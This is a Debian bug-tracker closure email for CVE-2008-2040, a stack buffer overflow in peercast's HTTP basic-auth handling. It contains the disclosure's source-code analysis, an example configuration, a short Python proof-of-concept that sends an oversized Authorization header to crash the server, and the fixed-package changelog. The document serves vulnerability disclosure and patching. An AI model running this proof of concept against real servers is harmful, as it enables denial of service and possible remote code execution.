Bug#478573: marked as done ([peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function)

[Debian Bug Tracking System]

Your message dated Fri, 02 May 2008 11:02:08 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#478573: fixed in peercast 0.1218+svn20080104-1.1
has caused the Debian Bug report #478573,
regarding [peercast] CVE-2008-2040 stack-based buffer overflow in 
HTTP::getAuthUserPass function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

--- Begin Message ---

Package: peercast
Severity: grave
Tags: security
X-Debbugs-CC: [EMAIL PROTECTED]

I found a security issue in the peercast server in the
HTTP::getAuthUserPass function. I already contacted the upstream author 6 days
ago and didn't get an answer yet so I am publishing this now.

From core/common/http.cpp:

105 void HTTP::getAuthUserPass(char *user, char *pass)
106 {
107         if (arg)
108         {   
109                 char *s = stristr(arg,"Basic");
110                 if (s) 
111                 {   
112                         while (*s)
113                                 if (*s++ == ' ')
114                                         break;
115                         String str;
116                         str.set(s,String::T_BASE64);
117                         str.convertTo(String::T_ASCII);
118                         s = strstr(str.cstr(),":");
119                         if (s) 
120                         {   
121                                 *s = 0;
122                                 if (user)
123                                         strcpy(user,str.cstr());
124                                 if (pass)
125                                         strcpy(pass,s+1);

This function is used if authentication to the peercast server is done by basic 
http auth
rather than by a cookie. In line 116 the base64 encoded string is copied into 
str.
Note the set method is peercasts own implementation of set since it 
reimplements the String
class. set looks like this:

From core/common/sys.h:
38                 MAX_LEN = 256 
...
62         void set(const char *p, TYPE t=T_ASCII)
63         {   
64                 strncpy(data,p,MAX_LEN-1);
65                 data[MAX_LEN-1] = 0;
66                 type = t;
67         }   

In line 117 the string gets decoded and in line 118 and 
following the part before ':' in the decoded string gets copied
into user and the part after it into pass.

From core/common/servhs.cpp:
558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local)
559 {
560         char user[64],pass[64];
561         user[0] = pass[0] = 0;
...
580     while (http.nextHeader())
581         {   
582                 char *arg = http.getArgStr();
583                 if (!arg)
584                         continue;
585
586                 switch (servMgr->authType)
587                 {   
588                         case ServMgr::AUTH_HTTPBASIC:
589                                 if (http.isHeader("Authorization"))
590                                         http.getAuthUserPass(user,pass);
591                                 break;

user and pass are only declared to have 64 bytes (line 558) while the buffer 
used for 
copy can store up to MAX_LEN (256) bytes (ok minus the : here). 
Servent::handshakeAuth calls then
the getAuthUserPass function triggering a buffer overflow.
It's thus possible to crash the server and execute arbitrary code if the server
allows http-basic authentication.

I already requested a CVE id for this.

An example configuration and PoC is attached.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

[Server]
serverPort = 7144
autoServe = Yes
forceIP = 
isRoot = No
maxBitrateOut = 0
maxRelays = 2
maxDirect = 0
maxRelaysPerChannel = 0
firewallTimeout = 30
forceNormal = No
rootMsg = 
authType = http-basic
cookiesExpire = session
htmlPath = html/en
minPGNUIncoming = 10
maxPGNUIncoming = 20
maxServIn = 50
chanLog = 
networkID = 00000000000000000000000000000000

[Broadcast]
broadcastMsgInterval = 10
broadcastMsg = 
icyMetaInterval = 8192
broadcastID = 008145B5C0427118B595AF7D9E110000
hostUpdateInterval = 180
maxControlConnections = 3
rootHost = yp.peercast.org

[Client]
refreshHTML = 5
relayBroadcast = 30
minBroadcastTTL = 1
maxBroadcastTTL = 7
pushTries = 5
pushTimeout = 60
maxPushHops = 8
autoQuery = 0
queryTTL = 7

[Privacy]
password = s0mep4ss
maxUptime = 0

[Filter]
ip = 255.255.255.255
private = Yes
ban = No
network = Yes
direct = Yes
[End]

[Notify]
PeerCast = Yes
Broadcasters = Yes
TrackInfo = Yes
[End]

[Server1]
allowHTML = Yes
allowBroadcast = Yes
allowNetwork = Yes
allowDirect = Yes
[End]

[Server2]
allowHTML = No
allowBroadcast = Yes
allowNetwork = No
allowDirect = No
[End]

[Debug]
logDebug = No
logErrors = No
logNetwork = No
logChannel = No
pauseLog = No
idleSleepTime = 10

#!/usr/bin/env python

import sys, socket

port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

if(len(sys.argv) < 2):
	print "ERR: please specify a hostname"
	sys.exit(-1)

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], port))
	s.send(buff);
except:
	print "ERR: socket()"
	sys.exit(-1)

pgpxRsr2O6jJD.pgp
Description: PGP signature

--- End Message ---

--- Begin Message ---

Source: peercast
Source-Version: 0.1218+svn20080104-1.1

We believe that the bug you reported is fixed in the latest version of
peercast, which is due to be installed in the Debian FTP archive:

peercast-handlers_0.1218+svn20080104-1.1_all.deb
  to pool/main/p/peercast/peercast-handlers_0.1218+svn20080104-1.1_all.deb
peercast-servent_0.1218+svn20080104-1.1_all.deb
  to pool/main/p/peercast/peercast-servent_0.1218+svn20080104-1.1_all.deb
peercast_0.1218+svn20080104-1.1.diff.gz
  to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1.diff.gz
peercast_0.1218+svn20080104-1.1.dsc
  to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1.dsc
peercast_0.1218+svn20080104-1.1_amd64.deb
  to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde <[EMAIL PROTECTED]> (supplier of updated peercast package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 02 May 2008 12:44:34 +0200
Source: peercast
Binary: peercast-servent peercast peercast-handlers
Architecture: source all amd64
Version: 0.1218+svn20080104-1.1
Distribution: unstable
Urgency: high
Maintainer: Romain Beauxis <[EMAIL PROTECTED]>
Changed-By: Nico Golde <[EMAIL PROTECTED]>
Description: 
 peercast   - P2P audio and video streaming servent
 peercast-handlers - P2P audio and video streaming handlers
 peercast-servent - P2P audio and video streaming servent (dummy package)
Closes: 478573
Changes: 
 peercast (0.1218+svn20080104-1.1) unstable; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * This update addresses the following security issue:
     - CVE-2008-2040: stack-based buffer overfow in the
       HTTP::getAuthUserPass function leading to remote DoS
       or arbitrary code execution if peercast is configured
       to use http-basic authentication (Closes: #478573).
Checksums-Sha1: 
 9c44bc5d221a820b5c65dd45fec7594a4642b35c 1142 
peercast_0.1218+svn20080104-1.1.dsc
 edc177024da645e969838f61c56ce9c93e519e32 9956 
peercast_0.1218+svn20080104-1.1.diff.gz
 8ac38683d3a489c31584c04614c272e91da4b53d 3784 
peercast-servent_0.1218+svn20080104-1.1_all.deb
 529e8c1fca0ece55d8af14d6e9332bb0ce7bd270 6908 
peercast-handlers_0.1218+svn20080104-1.1_all.deb
 6bba22f7e8a28a2c0464e07825734c2633d07dd9 200278 
peercast_0.1218+svn20080104-1.1_amd64.deb
Checksums-Sha256: 
 27bb594d4b66138131a53d6204e0fe4fcf690f943b4782395eaa8540fc08cb87 1142 
peercast_0.1218+svn20080104-1.1.dsc
 5cdcaac114a132202c6258603953fbdecb9f6941a8dc2431e577d9544406069a 9956 
peercast_0.1218+svn20080104-1.1.diff.gz
 5259ec71211bbb91b0bf7447bc50e074ca2a0e19362f57999e62489ee818a9ce 3784 
peercast-servent_0.1218+svn20080104-1.1_all.deb
 4713b8d72e5afbcc48f5f849442b3c14aee4206193e8f687101354cf6dfc175a 6908 
peercast-handlers_0.1218+svn20080104-1.1_all.deb
 c7bd5525327058b207702ea36dc12decd8cd95b1b184cbf1fdea7e5e6d3ba56f 200278 
peercast_0.1218+svn20080104-1.1_amd64.deb
Files: 
 31301f18409e31ddac40f89dc8ac2b3f 1142 sound optional 
peercast_0.1218+svn20080104-1.1.dsc
 98cbcc57586e3c39488adbd075d71908 9956 sound optional 
peercast_0.1218+svn20080104-1.1.diff.gz
 cfd41041fb026aed4240214017c14c88 3784 sound optional 
peercast-servent_0.1218+svn20080104-1.1_all.deb
 a54955b37b0205e005bbbb93efac0164 6908 sound optional 
peercast-handlers_0.1218+svn20080104-1.1_all.deb
 3c7c94e943a2f5ebeb7b3835a6ebf009 200278 sound optional 
peercast_0.1218+svn20080104-1.1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFIGvNRHYflSXNkfP8RAn8wAKCi22X2JDvzM4VTVEctcccqskhKmgCfUTuO
wRlEneLrE9SIy9zUZTFcaWA=
=5cuj
-----END PGP SIGNATURE-----

--- End Message ---